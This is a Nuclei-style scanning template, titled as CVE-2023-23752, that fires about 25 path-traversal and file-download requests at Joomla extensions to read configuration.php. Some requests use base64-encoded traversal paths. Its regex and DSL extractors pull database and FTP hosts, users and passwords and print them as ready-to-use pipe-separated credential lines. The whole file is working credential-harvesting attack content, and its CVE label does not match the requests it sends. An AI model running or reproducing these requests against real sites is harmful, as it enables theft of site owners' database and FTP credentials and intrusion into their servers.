id: CVE-2023-23752

info:
  name: 未授权访问漏洞(CVE-joomla)
  author: 0x0xporn
  severity: critical
  reference: https://neal.fun/

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php'
      - '{{BaseURL}}/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA='
      - '{{BaseURL}}/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php'
      - '{{BaseURL}}/index.php?option=com_macgallery&view=download&albumid=../../configuration.php'
      - '{{BaseURL}}/index.php?option=com_cckjseblod&task=download&file=configuration.php'
      - '{{BaseURL}}/plugins/content/fsave/download.php?filename=configuration.php'
      - '{{BaseURL}}/components/com_portfolio/includes/phpthumb/phpThumb.php?w=800&src=configuration.php'
      - '{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php'
      - '{{BaseURL}}/plugins/system/captcha/playcode.php?lng=configuration.php'
      - '{{BaseURL}}/index.php?option=com_rsfiles&task=download&path=../../configuration.php&Itemid=137'
      - '{{BaseURL}}/index.php?option=com_addproperty&task=listing&propertyId=73&action=filedownload&fname=../configuration.php'
      - '{{BaseURL}}/administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes'
      - '{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=/../../../../configuration.php'
      - '{{BaseURL}}/index.php?option=com_facegallery&task=imageDownload&img_name=../../configuration.php'
      - '{{BaseURL}}/plugins/content/s5_media_player/helper.php?fileurl=../../../configuration.php'
      - '{{BaseURL}}/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA=='
      - '{{BaseURL}}/modules/mod_dvfoldercontent/download.php?f=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA=='
      - '{{BaseURL}}/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php'
      - '{{BaseURL}}/index.php?option=com_jetext&task=download&file=../../configuration.php'
      - '{{BaseURL}}/index.php?option=com_product_modul&task=download&file=../../../../../configuration.php&id=1&Itemid=1'
      - '{{BaseURL}}/plugins/content/wd/wddownload.php?download=wddownload.php&file=../../../configuration.php'
      - '{{BaseURL}}/index.php?option=com_community&view=groups&groupid=33&task=app&app=groupfilesharing&do=download&file=../../../../configuration.php&Itemid=0'
      - '{{BaseURL}}/index.php?option=com_download-monitor&file=configuration.php'
      - '{{BaseURL}}/index.php?jat3action=gzip&type=css&file=configuration.php'
      - '{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../configuration.php'
       
    headers:
      User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0
      
    stop-at-first-match: true
    redirects: false
    matchers-condition: or
    matchers:
      - type: dsl      
        dsl:
          - contains(body,"$host")       
          - contains(body,"$password")
          - status_code==200
        condition: and

      - type: dsl
        dsl:
          - contains(body,"ftp_pass")       
          - status_code==200
        condition: and

    extractors:
    #===DB===#
      - type: regex
        name: host
        internal: true 
        group: 1       
        regex:
          - "(?mi)\\$host\\s*[=:]\\s*\\'(.*?)\\'"

      - type: regex
        name: user
        internal: true 
        group: 1               
        regex:
          - "(?mi)\\$user\\s*[=:]\\s*\\'(.*?)\\'"

      - type: regex
        name: pass
        internal: true  
        group: 1              
        regex:
          - "(?mi)\\$password\\s*[=:]\\s*\\'(.*?)\\'"

      - type: regex
        name: type
        internal: true
        group: 1        
        regex:
          - "(?mi)\\$dbtype\\s*[=:]\\s*\\'(.*?)\\'"

    #===FTP===#
      - type: regex
        name: ftp_host
        internal: true 
        group: 1       
        regex:
          - "(?mi)\\$ftp_host\\s*[=:]\\s*\\'(.*?)\\'"

      - type: regex
        name: ftp_port
        internal: true 
        group: 1               
        regex:
          - "(?mi)\\$ftp_port\\s*[=:]\\s*\\'(.*?)\\'"          

      - type: regex
        name: ftp_user
        internal: true 
        group: 1               
        regex:
          - "(?mi)\\$ftp_user\\s*[=:]\\s*\\'(.*?)\\'"

      - type: regex
        name: ftp_pass
        internal: true  
        group: 1              
        regex:
          - "(?mi)\\$ftp_pass\\s*[=:]\\s*\\'(.*?)\\'"

      - type: regex
        name: ftp_root
        internal: true
        group: 1        
        regex:
          - "(?mi)\\$ftp_root\\s*[=:]\\s*\\'(.*?)\\'"

    #===MAKE-LINES===#           

      - type: dsl
        name: joom_db
        dsl:
          - '"db_cred: " + host + "|" + "3306" + "|" + user + "|" + pass '

      - type: dsl
        name: ftp_enable
        dsl:
          - 'ftp_host + "|" + ftp_port + "|" + ftp_user + "|" + ftp_pass '

      - type: dsl
        name: ftp_root
        dsl:
          - 'ftp_host + "|" + ftp_port + "|" + ftp_user + "|" + ftp_pass + "|" + ftp_root '